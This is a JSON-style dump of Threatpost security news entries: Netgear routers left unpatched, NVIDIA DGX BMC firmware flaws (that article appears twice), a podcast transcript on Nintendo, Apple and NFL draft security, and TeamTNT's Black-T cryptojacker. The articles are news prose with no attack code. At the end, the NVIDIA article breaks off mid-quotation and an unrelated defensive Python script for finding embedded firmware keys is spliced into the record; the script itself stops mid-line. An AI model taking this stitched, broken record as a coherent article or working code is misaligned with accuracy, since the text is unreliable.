\u201cBasically everything \u2013 including software, toys, cars, electronics, appliances \u2013 will reach an age where their manufacturer will no longer support them. The duration of support varies widely and software tends to be on the shorter side since new development is done much more rapidly than hardware.\u201d\n\n\u201cConsumers should always ensure their devices are still supported by manufacturers and check the available support before purchasing a new device,\u201d said Gorenc.\n\nVulnerabilities in routers have been discovered several times over the past year. In March, [Netgear warned users](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) of a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. In July, a pair of [flaws in ASUS routers](<https://threatpost.com/asus-home-router-bugs-snooping-attacks/157682/>) for the home were uncovered that could allow an attacker to compromise the devices \u2013 and eavesdrop on all of the traffic and data that flows through them.\n\n_This article was updated on Aug. 4 at 11:30 am ET with further comments from Netgear._\n
\n", "cvss3": {}, "published": "2020-08-03T19:03:46", "type": "threatpost", "title": "Netgear Won't Patch 45 Router Models Vulnerable to Serious Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-03T19:03:46", "id": "THREATPOST:9AADE8E4BD604BE3415C6DD56ECA3640", "href": "https://threatpost.com/netgear-wont-patch-45-router-models-vulnerable-to-serious-flaw/157977/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-29T23:39:12", "description": "NVIDIA released a patch for a critical bug in its high-performance line of DGX servers that could open the door for a remote attacker to take control of and access sensitive data on systems typically operated by governments and Fortune-100 companies.\n\nIn all, NVIDIA [issued nine patches](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>), each fixing flaws in firmware used by DGX high-performance computing (HPC) systems, which are used for processor-intensive artificial intelligence (AI) tasks, machine learning and data modeling. All of the flaws are in the AMI firmware that runs on the DGX baseboard management controller (BMC), the embedded controller that provides out-of-band remote monitoring and management of the server.\n\n\u201cAttacks can be remote (in case of internet connectivity), or if bad guys can root one of the boxes and get access to the BMC they can use the out of band management network to PWN the entire datacenter,\u201d wrote researcher Sergey Gordeychik who is credited for finding the bugs. 
\u201cIf you have access to OOB, it is game over for the target.\u201d\n\nGiven the high-stakes computing jobs typically running on the HPC systems, the researcher noted an adversary exploiting the flaw could \u201cpoison data and force models to make incorrect predictions or infect an AI model.\u201d\n\n## **No Patch Until 2021 for One Bug**\n\nNVIDIA said a patch fixing one high-severity bug (CVE-2020-11487), specifically impacting its DGX A100 server line, would not be available until the second quarter of 2021. The vulnerability is tied to a hard-coded 1024-bit RSA key and weak ciphers that could lead to information disclosure. A fix for the same bug (CVE-2020-11487), impacting other DGX systems (DGX-1, DGX-2), is available.\n\n\u201cTo mitigate the security concerns,\u201d NVIDIA wrote, \u201climit connectivity to the BMC, including the web user interface, to trusted management networks.\u201d\n\n## **Bugs Highlight Weaknesses in AI and ML Infrastructure**\n\n\u201cWe found a number of vulnerable servers online, which triggered our research,\u201d the researcher told Threatpost. The bugs were disclosed Wednesday and presented as part of a [presentation](<https://codeblue.jp/2020/en/speakers/?content=undefined>) \u201c[Vulnerabilities of Machine Learning Infrastructure](<https://codeblue.jp/2020/en/speakers/>)\u201d at [CodeBlue 2020](<https://codeblue.jp/2020/en/>), a security conference in Tokyo, Japan.\n\nDuring the session Gordeychik demonstrated how NVIDIA DGX GPU servers used in machine learning frameworks (Pytorch, Keras and Tensorflow), data processing pipelines and applications such as medical imaging and face recognition powered CCTV \u2013 could be tampered with by an adversary.\n\nThe researcher noted that other vendors are also likely affected. \u201cInteresting thing here is the supply chain. NVIDIA uses a BMC board by Quanta Computers, which is based on AMI software. 
So to fix issues [NVIDIA] had to push several vendors to get a fix.\u201d\n\nThose vendors include:\n\n * IBM (BMC Advanced System Management)\n * Lenovo (ThinkServer Management Module)\n * Hewlett-Packard Enterprise Megarac\n * Mikrobits (Mikrotik)\n * Netapp\n * ASRockRack IPMI\n * ASUS ASMB9-iKVM\n * DEPO Computers\n * TYAN Motherboard\n * Gigabyte IPMI Motherboards\n * Gooxi BMC\n\n## **Nine CVEs**\n\nAs for the actual patches issued by NVIDIA on Wednesday, the most serious is tracked as CVE-2020-11483 and is rated critical. \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure,\u201d according to the security bulletin.\n\nImpacted NVIDIA DGX server models include DGX-1, DGX-2 and DGX A100.\n\nFour of the NVIDIA bugs were rated high-severity (CVE-2020-11484, CVE-2020-11487, CVE-2020-11485, CVE-2020-11486), with the most serious of the four tracked as [CVE-2020-11484](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>). \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure,\u201d the chipmaker wrote.\n\nThree of the other patched vulnerabilities were rated medium severity and one low.\n\n\u201cHackers are well aware of AI and ML infrastructure issues and use ML infrastructure in attacks,\u201d Gordeychik said.\n", "cvss3": {}, "published": "2020-10-29T23:15:17", "type": "threatpost", "title": "NVIDIA Patches Critical Bug in High-Performance Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-29T23:15:17", "id": "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "href": "https://threatpost.com/nvidia-patches-critical-bug-in-hpc/160762/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:26:07", "description": "For the week ended April 24, Threatpost editors discuss the hottest cybersecurity news stories, including:\n\n * Apple [zero days disclosed](<https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/>) in the iPhone iOS that researchers say have been exploited for years. 
Meanwhile, [Apple has pushed back](<https://threatpost.com/apple-pushes-back-against-zero-day-exploit-claims/155108/>) and said there\u2019s no evidence to support such activity.\n * Nintendo [confirming that](<https://threatpost.com/nintendo-confirms-breach-of-160000-accounts/155110/>) over 160,000 accounts have been hacked, due to attackers abusing a legacy login system (NNID).\n * With the [NFL\u2019s virtual draft](<https://threatpost.com/nfl-tackles-cybersecurity-2020-draft-day/155004/>) kicking off this week, security researchers and teams have been sounding off on security issues leading to data theft or denial of service attacks.\n\n[Download direct here](<http://traffic.libsyn.com/digitalunderground/news_wrap_apr_24_3.mp3>) to listen to the podcast.\n\n_Below find a lightly edited transcript of the Threatpost news wrap._\n\n**Lindsey O\u2019Donnell-Welch**: Hello everyone, welcome back to the [Threatpost news wrap](<https://threatpost.com/category/podcasts/>). You\u2019ve got the Threatpost team here today to discuss this week\u2019s top cyber security news, including myself, Lindsey O\u2019Donnell-Welch and Threatpost editors Tom Spring and Tara Seals. Tom and Tara, happy Friday.\n\n**Tom Spring**: Hey!\n\n**Tara Seals:** Hey, Lindsey. How are you?\n\n**Lindsey:** Good. There\u2019s been a lot of news from this week that we need to unpack. We\u2019ve had leaked source code, Apple zero days, security issues around the NFL draft. 
So, Tom, I mean, starting with the Apple zero days, that was kind of a huge news item of the week, and there was some back and forth, and I think the most recent thing, was Apple having a statement come out today about the zero days. Can you kind of give us a sense of what that was all about?\n\n**Tom:** Well, sure, sure. It\u2019s an evolving story. And it started a couple days ago when a number of researchers and I\u2019m probably gonna mispronounce the name of the security firm, ZecOps or something along those lines -I can never pronounce these names \u2013 But anyways, they found two zero days, or what they claimed are two zero days that are very, very troubling when described. An attacker can send an email to an iOS device. And if Apple\u2019s default mail program receives that message, there are two vulnerabilities \u2013 an out of bounds write vulnerability and a heap overflow bug \u2013 that kick in when this specially crafted message arrives. In very simple terms, the bugs impact the way that the mail program processes memory. And I won\u2019t get into the technical aspects of it, we\u2019ve written about it, it\u2019s on Threatpost. But essentially, the hackers can use this to either extract data from the mailbox itself, and or combine the flaw to actually take over the device or take control of the device. This was something that was very shocking considering that any modern patched version of the iOS was vulnerable to this attack. The researchers said that this is an attack that\u2019s been used in the wild in a number of targeted attacks by some APTs. And so that story goes. Apple did release a beta update to iOS. And it was reported a couple days ago. And it seemed to suggest Apple was kind of quiet at the time. But given that Apple had released a beta version of its iOS, it seemed that Apple was was not explicitly stating that there was a problem, but suggested it by sending out a patch. 
Now today, Apple is downplaying the impact of the bug and saying that it has found no evidence that that the bug, number one, has been used in the wild. And just to briefly, quote, Apple\u2019s statement released I believe was yesterday: \u201cWe have concluded these issues do not pose an immediate risk to our users. The researchers identified three issues in mail, but alone, they are insufficient to bypass iPhone or iPad protections. And we have found no evidence they were used against customers.\u201d So we have the classic he said, she said, and we\u2019ll see how this plays out. But it\u2019s high drama, once again with zero days, zero day claims and zero day denials.\n\n**Lindsey:** Yeah, it definitely seems like it is turning into kind of a he said-she said type of report. And it\u2019s interesting too, you know, just looking at ZecOp\u2019s report, they did kind of go into deep detail about the flaws being exploited in the wild. And I think they had mentioned that there were a number of different targets, including individuals from a Fortune 500 org in North America, and executives from a Japanese based carrier. So it is just kind of interesting that Apple is pushing about back against those specific claims that the bugs have been exploited for years. And I\u2019m curious to see kind of where this goes and whether the researchers respond back to Apple at all, and, you know, further kind of corroborate what they had written in the report.\n\n**Tom:** Yeah, well, you know, Apple has gotten some support from the research community. I believe that Google\u2019s Project Zero researchers have chimed in expressing some doubt on the ZecOps research. Meanwhile if anybody\u2019s worried there is the beta version of the iOS that you can download right now and I\u2019m sure we\u2019re going to be hearing more from Apple about them pushing out an update, a final update, for the iOS as well. 
But you know, I mean, I mean here again, you have Apple which is tight lipped won\u2019t comment and I mean, they have to put out a statement days after the the researchers come out with their their findings. From a reporter standpoint, it would be so nice [if Apple would open up a bigger dialogue](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>), not only with journalists, but especially with researchers in terms of maybe helping them better understand what they found, the original research really, casted no doubt on their own research. I mean, why would they, but at least, you know, they could have tempered some of their research with some feedback from Apple. I\u2019m not too sure if they purposely left it out. But you know, historically speaking, it\u2019s tough for researchers to get to vendors to give a [full throated response to their research](<https://threatpost.com/google-bug-hunter-urges-apple-to-change-its-ios-security-culture/134842/>), but we shall be following this story. I\u2019m sure we might even see some interesting things happen over the weekend and Monday morning. We\u2019ll be watching carefully.\n\n**Tara**: I have a question Tom. Have there been any third party researchers that have taken a look at this and weighed in at all with an opinion?\n\n**Tom:** Well, Google Project Zero did. And they cast some doubt on the research itself. I\u2019m not aware of anybody else, I\u2019ve heard a lot of researchers comment on the zero days, but they were commenting in reaction to the actual research being released, they weren\u2019t commenting on, their own reverse engineering, the proof of concepts and dissecting the research itself. So, you know, there could be a lot more noise going out there. And again, this is a fast moving story, and it\u2019s evolving quickly. 
And we will be keeping a close eye on the Twittersphere of reliable researchers and reaching out to a lot of people on the phone and hopefully, we\u2019ll have a good solid update either over the weekend or ASAP to better assess the real threat here with these \u201czero days.\u201d\n\n**Lindsey: **Right. Well, that was definitely one of the bigger stories of this week. And actually another big story, I guess two similar stories kind of revolved around the gaming community. And one of those stories was Nintendo today, coming out and confirming that 160,000 accounts have been hacked.\n\n**Tom:** Yeah Lindsey, which Nintendo\u2019s accounts? Do we know? I mean, I\u2019m just thinking about my my son\u2019s different accounts with Nintendo. Do we know what platform or services may have been impacted?\n\n**Lindsey:** Yeah, so, basically over the past few weeks, gamers who are using the Nintendo Switch were reporting suspicious activities on their accounts. And they were basically going on Twitter and there were different posts on Reddit saying that unauthorized actors had been logging into their accounts using their PayPal or their payment card methods that were connected to the accounts and buying digital currency for like, online in-game systems. So like [Fortnite V-Bucks](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>), etc, etc. This was reported over the past few weeks by various outlets, but Nintendo had stayed kind of silent about whether this was actually happening or what was behind this. And finally, in a statement today, it said that it first of all confirmed the attacks, it said that specifically 160,000 accounts were hacked, and it said the reason that this hack was occurring was because attackers were abusing the Nintendo Network ID legacy login system, which I don\u2019t know if you guys remember but that was from the Nintendo 3DS and Wii U console. 
That was what was primarily used to login and to buy digital currency for those accounts. So anyways, Nintendo was saying that this login ID was being linked to various Nintendo accounts for the switch. And somehow attackers were able to access the accounts tied to this legacy login system and were then able to access the linked Nintendo accounts for the Switch. And from there, they\u2019d have access to the different payment methods, and were able to make the in-game purchases. So Nintendo didn\u2019t provide any further details about how these accounts were specifically being accessed. But they did say that they were being obtained by some means other than their own service. So I know there had been theories about like credential stuffing or otherwise but that doesn\u2019t seem like it was the case here. So it\u2019s now disabled the NNID login service so that you can\u2019t use that anymore.\n\n**Tom:** Well, I\u2019ll hear from my son with if he\u2019s had trouble connecting, and I\u2019ll know what\u2019s going on.\n\n**Lindsey:** Yeah, yeah, I would check in and make sure.\n\n**Tom:** I wrote a [story about at Linksys, they had to reset their passwords](<https://threatpost.com/attacks-on-linksys-routers-trigger-mass-password-reset/154914/>). And I\u2019m a Linksys customer. And they assured me that every single Linksys customer had been notified. And then I was like, \u201cWell, hold on a minute. I\u2019m a Linksys customer, I haven\u2019t been notified.\u201d And they backtracked and said, \u201cwell, we\u2019re doing it in waves.\u201d So I take it with a grain of salt, when a lot of these companies say they\u2019ve implemented a fix \u2013 whether or not that fix is immediate or whether phases in over time. 
So I\u2019ll be interested to hear whether my son\u2019s actually having issues or not, or whether they\u2019ve reset passwords or whatnot.\n\n**Lindsey:** Yeah, well, it seems like a lot of companies can post the statement onto their Twitter accounts or on their website and think that\u2019s enough. But you\u2019d be surprised that the number of people who actually need the email notification to be notified of these hacks. So, but it did advise players to set up two factor authentication, of course, to add that extra layer of security to accounts. And it is also resetting the passwords for affected accounts. So hopefully, this problem will go away. I know it had been a widespread kind of issue for people who had been reporting about it online. So we\u2019ll see.\n\nThat was one of the news related to kind of gaming. The other one was the [discovery of leaked source code this week](<https://threatpost.com/valve-confirms-csgo-team-fortress-2-source-code-leak/155092/>) for two popular games that were published by Valve. Those were Counter Strike: Global Offensive and Team Fortress 2. And basically, that was a whole issue because the source code, if accessed, could lead to security issues or cheating, which probably isn\u2019t as serious, but you know, it\u2019s still a problem. And Valve, the developer and publisher of the two games, came out and basically said that the source code in question dates back to 2017, and was already part of an existing leak from 2018. But anyways, I think that goes to show that these security issues do continue to pop up in the gaming space. 
And there\u2019s such like a massive install base for gamers that this is just a [really lucrative area for cybercriminals](<https://threatpost.com/researcher-discloses-second-steam-zero-day-after-valve-bug-bounty-ban/147593/>) to be looking at.\n\n**Tara:** Yeah, I definitely think that\u2019s the point I was going to make is that, I think, Nintendo has 20 million active users or something like that. And these massive multiplayer games have millions of users to in some cases, and so, you know, I\u2019m surprised we don\u2019t care more about gamer hacking stuff to be honest.\n\n**Lindsey:** Yeah, definitely. I definitely agree, Tara. And so, and then Tara, you also had a very timely news story about the NFL Draft, which is virtual this year and kind of the security concerns that researchers and also teams were having with the event as it starts this week. What was kind of the top concerns there?\n\n**Tara: **Yeah, so the NFL Draft, obviously is a massive, massive event for the league every single year. This is for the sliver of the population that doesn\u2019t know about it, it\u2019s basically where you have pro teams that are looking at the people that are coming out of college and, you know, the Canadian league and some other places that you know, have not been signed to the pros yet, and they evaluate their stats and everything and then this is their opportunity to find new people to the roster. And so in the past this has been done in sort of public space and everybody kind of gets together and teams will congregate at their stadiums and war rooms and things like that. That\u2019s not possible. And so everybody is basically trying to do this with one to one links, you know, from their houses. 
So you have a head coach in his house or her house, and then you have, you know, the GM in their house and then obviously, all the players trying to tune in, the prospective players that is and so if you look at it, the communications footprint here, the distributed communications footprint is pretty massive. And so in order to bring everybody together to make this happen, there\u2019s a couple of different platforms to do that, one was Microsoft Teams, and then there\u2019s Zoom, you know, infamous Zoom, which clubs are using to communicate amongst themselves.\n\n**Lindsey:** The security issues here are really something that\u2019s good to be looking at right now, with something as big as this, and it\u2019s something that we\u2019ll also have to probably continue looking at for for the foreseeable future. But I also think kind of the technical logistics in the background are important too. And I saw on Twitter yesterday, there was like this [picture of Belichick looking at the draft from his house](<https://twitter.com/jeffphowe/status/1253504449244512257?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1253504449244512257&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost.php%3Fpost%3D155122%26action%3Dedit>) in Nantucket and a bunch of people were, laughing about the fact that, questioning how he was able to get Wi-Fi on on Nantucket, and whether it was able to hold up and all these things. So I think, it\u2019s just so new that there\u2019s a lot of like questions and technical concerns there too.\n\n**Tara:** Yeah, it\u2019s kind of interesting because there are 100+ video feeds when you take into account you know, all the general managers, all the prospects which there are 58 different prospects and the coaches themselves and then plus that\u2019s not even including, you know, the individual underlings that are involved in the process. But yeah, the Belichick thing was really funny. 
And then also the [head coach of the Arizona Cardinals was all over Twitter](<https://twitter.com/nfldraftscout/status/1253478908487503873?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1253478908487503873&ref_url=https%3A%2F%2Fnesn.com%2F2020%2F04%2Fnfl-twitter-went-bananas-after-seeing-cardinals-kliff-kingburys-pad%2F>), it went totally viral yesterday, he has this sort of Bond villain layer in the Phoenix mountains vibe. It was all like gleaming white and like he\u2019s wearing, you know, Italian loafers. And he just looks at like an Armani ad or something. I mean, there\u2019s a lot of cultural fun stuff that goes along with this. But there\u2019s also a lot of, you know, legitimate cyber security concerns. And so, with the draft picks, you know, you wouldn\u2019t think of that as being sort of critical information, but it really is. And you consider that if a team\u2019s job strategy is leaked to another team, then that\u2019s obviously competitive and that can destroy a team season in theory. You also have, if these things are able to be intercepted, then it can be very useful for people in the online gambling world, for example, there\u2019s a lot of fraud that can be carried out with that. And so there are a few different things that can be done if job information falls into the wrong hands. And so that\u2019s really what they were concerned about. I did reach out to the NFL to find out what their take was on cyber security, and they wouldn\u2019t reveal what exactly they\u2019ve done. But they did say that they they are aware of the potential dangers, and I mean, the draft is going to continue through tomorrow. So, you know, remains to be seen if they successfully warded off any attacks or not.\n\n**Lindsey:** Right, I was about to ask if there have been any incidents so far, but I\u2019m sure that remains to be seen at this point. 
But yeah, I think that you know, obviously the the data itself in terms of team strategy and personnel plans is a big issue. And also I feel like denial of service could be an issue here too. And you know, launching a denial of service attack or even kicking people off.\n\n**Tara:** Yeah, I\u2019m so glad that you said that actually. Because that is that is one thing that one of the security researchers that I talked to had mentioned was that the denial of service aspect of this, obviously. So anybody who plays Fantasy Football is familiar with this, but you get a very short window of time to make your job spec and it\u2019s kind of a snooze, you lose if you don\u2019t do it in that time period, then you get passed over and you don\u2019t get to go back and redo it. So, you know, conceivably, an attacker could DDoS someone you know, a club and prevent them from making their draft pick and there would be no way for them to go back and remediate that really. So again, these are things that can make a pretty radical difference when it comes to the team\u2019s future. And of course, this is assuming that we\u2019re going to have an NFL season this year.\n\n**Lindsey:** We\u2019ll see. Fingers crossed. I really like that story. It\u2019s a fun and applicable story. And you know, I put it on Facebook and someone posted, \u201cyou know [the NFL has] been hacked when the first person picked is Terry Bradshaw.\u201d All right. Well, on that note, it\u2019s been a very busy week in the infosec world, and there\u2019s much more that needs to be covered. So let\u2019s wrap up the podcast here, Tom and Tara, thanks for coming on today.\n\n**Tom:** Yeah, thank you.\n\n**Tara:** Thanks, Lindsey. You guys have a good weekend.\n\n**Lindsey:** You too. And to all our listeners. Thank you for joining us today. If you like what you\u2019ve heard here, be sure to share this episode on social media. 
And if you have any comments or thoughts regarding Apple zero days, or any of the new stories that we\u2019ve talked about today, please [reach out to us on Twitter at @Threatpost](<https://twitter.com/threatpost>) and let\u2019s keep the conversation going. If not, catch us next week on the Threatpost podcast.\n", "cvss3": {}, "published": "2020-04-24T17:11:16", "type": "threatpost", "title": "News Wrap: Nintendo Account Hacks, Apple Zero Days, NFL Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-24T17:11:16", "id": "THREATPOST:CAAA6F4ECA9D8F91250F10C27A869E23", "href": "https://threatpost.com/news-wrap-nintendo-account-hacks-apple-zero-days-nfl-security/155122/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:09:04", "description": "Researchers have discovered the latest cryptojacking malware gambit from TeamTNT, called Black-T. The variant builds on the group\u2019s typical approach, with a few new \u2014 and sophisticated \u2014 extras.\n\nTeamTNT is known for its targeting of Amazon Web Services (AWS) credentials, to break into the cloud and use it to mine for the [Monero](<https://threatpost.com/monero-cybercrime-mining-malware/141116/>) cryptocurrency. But according to researchers with Palo Alto Networks\u2019 Unit 42, with [Black-T](<https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/>), the group has added new capabilities to its tactics, techniques and procedures (TTPs). 
These include the addition of sophisticated network scanners; the targeting of competitor XMR mining tools on the network; and the use of password scrapers.\n\nWhat TeamTNT plans to do with the saved passwords and additional capabilities is still unclear, but the development signals that the group doesn\u2019t plan to slow down anytime soon.\n\nIn August, [TeamTNT was identified by researchers](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) as the first cryptojacking group to specifically target AWS. With increasingly sophisticated TTPs, the cybercriminal gang appears to be gaining steady momentum. Just last month, TeamTNT was discovered to have been leveraging a common open-source cloud monitoring tool called [Weave Scope, to infiltrate the cloud](<https://threatpost.com/teamtnt-remote-takeover-cloud-instances/159075/>) and execute commands without breaching the server.\n\nBlack-T represents a notable jump forward in the operation\u2019s sophistication, researchers said.\n\nOnce deployed, the first order of business for Black-T is to disable any other malware competing for processing power, including Kinsing, Kswapd0, ntpd miner, redis-backup miner, auditd miner, Migration miner, the Crux worm and Crux worm miner. Ironically, the fact that TeamTNT identified these competitors in its malware gives security professionals a critical heads-up to be on the lookout for potential threats from these groups, Unit 42 said.\n\nThis kind of cryptojacking turf warfare isn\u2019t new, but it appears to be accelerating.\n\n\u201cThe battle for cloud resources will continue well into the future,\u201d Nathaniel Quist, senior threat researcher for Unit 42, said. 
\u201cIn the past, attacker groups like [Rocke](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) and [Pacha](<https://www.paloaltonetworks.com/resources/research/digital-executive-summary-unit-42-cloud-threat-report-spring-2020>) would battle for resources. TeamTNT is battling with Kinsing malware and Crux worm today. I believe that this battle for resources will increase and attacker groups will look for other opportunities to use cloud resources. We can see this now with TeamTNT collecting passwords and AWS credentials in an attempt to expand and maintain a cloud presence.\u201d\n\nAfter it eliminates the competition, Black-T installs masscan and libpcap to scan and listen to various resources on the network, along with pnscan, zgrab, Docker and jq (the latter is a flexible command-line JSON processor, according to Unit 42).\n\n\u201cTeamTNT is investing more resources into scanning operations, likely with the intent to identify and compromise more cloud systems,\u201d Quist added. \u201cZmap is a known open-source scanning solution and with the creation of zgrab, a GoLang tool written for zmap, it is attempting to capitalize on the added benefits of the Go programming language, such as speed and performance increases. It is likely that TeamTNT actors are attempting to refine their scanning capabilities to make them faster, more accurate and less resource-intensive.\u201d\n\nNext, Black-T fetches various downloads: Beta to create a new directory; the mimipy and mimipenquin password scraping tools; and the XMR mining software called bd.\n\n\u201cThe inclusion of memory password-scraping tools should be considered an evolution of tactics,\u201d Quist said. \u201cTeamTNT has already integrated the collection and exfiltration of AWS credentials from compromised cloud systems, which provides post-exploitation capabilities. 
By adding memory password-scraping capabilities, TeamTNT actors are increasing their chances in gaining persistence within cloud environments.\u201d\n\nThe use of [worms](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>) like masscan or pnscan by TeamTNT isn\u2019t new, but Unit 42 noticed Black-T adds a new scanning port. Researchers wonder whether this signals the group has figured out how to target Android devices as well.\n\nAs remote work and cost savings continue to drive computing to the cloud, more groups like TeamTNT are sure to emerge ready to take advantage, according to Quist. Admins should take steps to ensure that [Docker](<https://threatpost.com/doki-backdoor-docker-servers-cloud/157871/>) and daemon APIs, as well as any other sensitive network services, aren\u2019t exposed, so that the cloud can be protected from the next evolution of cloud cryptojackers, he added.\n", "cvss3": {}, "published": "2020-10-05T19:47:05", "type": "threatpost", "title": "Black-T Malware Emerges From Cryptojacker Group TeamTNT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-05T19:47:05", "id": "THREATPOST:D4F89B42660582EFECA648A891470AD4", "href": "https://threatpost.com/blackt-cryptojacker-teamtnt/159853/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-29T23:46:43", "description": "NVIDIA released a patch for a critical bug in its high-performance line of DGX servers that could open the door for a remote attacker to take control of and access sensitive data on systems typically operated by governments and Fortune-100 companies.\n\nIn all, NVIDIA [issued nine patches](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>), each fixing flaws in firmware used by DGX high-performance computing (HPC) systems, which are used for processor-intensive artificial intelligence (AI) tasks, machine learning and data modeling. All of the flaws are tied to its own firmware that runs on its DGX AMI baseboard management controller (BMC), the brains behind the remote monitoring service for those servers.\n\n\u201cAttacks can be remote (in case of internet connectivity), or if bad guys can root one of the boxes and get access to the BMC they can use the out of band management network to PWN the entire datacenter,\u201d wrote researcher Sergey Gordeychik who is credited for finding the bugs. 
\u201cIf you have access to OOB, it is game over for the target.\u201d\n\nGiven the high-stakes computing jobs typically running on the HPC systems, the researcher noted an adversary exploiting the flaw could \u201cpoison data and force models to make incorrect predictions or infect an AI model.\u201d\n\n## **No Patch Until 2021 for One Bug**\n\nNVIDIA said a patch fixing one high-severity bug (CVE-2020-11487), specifically impacting its DGX A100 server line, would not be available until the second quarter of 2021. The vulnerability is tied to a hard-coded 1024-bit RSA key with weak ciphers that could lead to information disclosure. A fix for the same bug (CVE-2020-11487), impacting other DGX systems (DGX-1, DGX-2), is available.\n\n\u201cTo mitigate the security concerns,\u201d NVIDIA wrote, \u201climit connectivity to the BMC, including the web user interface, to trusted management networks.\u201d\n\n## **Bugs Highlight Weaknesses in AI and ML Infrastructure**\n\n\u201cWe found a number of vulnerable servers online, which triggered our research,\u201d the researcher told Threatpost. The bugs were disclosed Wednesday and presented as part of a [presentation](<https://codeblue.jp/2020/en/speakers/?content=undefined>) \u201c[Vulnerabilities of Machine Learning Infrastructure](<https://codeblue.jp/2020/en/speakers/>)\u201d at [CodeBlue 2020](<https://codeblue.jp/2020/en/>), a security conference in Tokyo, Japan.\n\nDuring the session Gordeychik demonstrated how NVIDIA DGX GPU servers used in machine learning frameworks (PyTorch, Keras and TensorFlow), data processing pipelines and applications such as medical imaging and face-recognition-powered CCTV \u2013 could be tampered with by an adversary.\n\nThe researcher noted that other vendors are also likely impacted. \u201cInteresting thing here is the supply chain,\u201d he said. 
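The key bug above is a private key baked into a firmware image, so every unit that ships that image shares it. The check a firmware reviewer wants is a scan of the image for embedded PEM keys with the RSA modulus size reported. The following is an added example, not NVIDIA's code or the researcher's tooling: the firmware blob is constructed inline around a fake PKCS#1-shaped RSA key (its modulus is filler, not a real key pair) so it runs offline, the parser reads only the RSAPrivateKey prefix (SEQUENCE { INTEGER version, INTEGER modulus, ... }), and MIN_RSA_BITS is an assumed policy floor.

```python
"""Scan a firmware image for embedded PEM private keys and report RSA modulus size."""
import base64
import re

MIN_RSA_BITS = 2048   # assumed policy floor; the key in the article is 1024-bit

PEM_RE = re.compile(
    rb"-----BEGIN (RSA |EC |)PRIVATE KEY-----\s*(.*?)\s*-----END \1PRIVATE KEY-----",
    re.DOTALL,
)


def _der_len(buf, i):
    """Decode a DER length at buf[i]; return (length, index after the length)."""
    first = buf[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n


def rsa_modulus_bits(der):
    """Bit length of the modulus in a PKCS#1 RSAPrivateKey DER structure."""
    if der[0] != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, i = _der_len(der, 1)
    if der[i] != 0x02:                      # INTEGER version
        raise ValueError("expected INTEGER version")
    vlen, i = _der_len(der, i + 1)
    i += vlen
    if der[i] != 0x02:                      # INTEGER modulus
        raise ValueError("expected INTEGER modulus")
    mlen, i = _der_len(der, i + 1)
    modulus = der[i:i + mlen].lstrip(b"\x00")   # drop the sign-padding byte
    return modulus[0].bit_length() + 8 * (len(modulus) - 1)


def scan_firmware(blob):
    """Return (offset, key_kind, modulus_bits_or_None, is_weak) per PEM key found.

    Any key in a firmware image is a finding (it is shared by every device);
    RSA keys below MIN_RSA_BITS are additionally flagged weak.
    """
    findings = []
    for m in PEM_RE.finditer(blob):
        kind = m.group(1).decode().strip() or "generic"
        bits = None
        if kind == "RSA":
            try:
                bits = rsa_modulus_bits(base64.b64decode(m.group(2)))
            except (ValueError, IndexError):
                bits = None                 # truncated or non-PKCS#1 blob
        weak = kind == "RSA" and bits is not None and bits < MIN_RSA_BITS
        findings.append((m.start(), kind, bits, weak))
    return findings


# --- constructed sample data (not a real key) -------------------------------
def _der_len_enc(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_int(value):
    if value[0] & 0x80:
        value = b"\x00" + value             # keep the INTEGER positive
    return b"\x02" + _der_len_enc(len(value)) + value


def make_fake_rsa_pem(bits):
    """PKCS#1-shaped DER with a filler modulus of `bits` bits, wrapped as PEM."""
    modulus = b"\xc3" + b"\x5a" * (bits // 8 - 1)
    body = _der_int(b"\x00") + _der_int(modulus) + _der_int(b"\x01\x00\x01")
    der = b"\x30" + _der_len_enc(len(body)) + body
    return (b"-----BEGIN RSA PRIVATE KEY-----\n" + base64.encodebytes(der)
            + b"-----END RSA PRIVATE KEY-----\n")


# constructed firmware image: padding, a path string, the fake key, more padding
FIRMWARE = b"\x00" * 64 + b"/etc/lighttpd/server.pem\x00" + make_fake_rsa_pem(1024) + b"\xff" * 32

if __name__ == "__main__":
    for offset, kind, bits, weak in scan_firmware(FIRMWARE):
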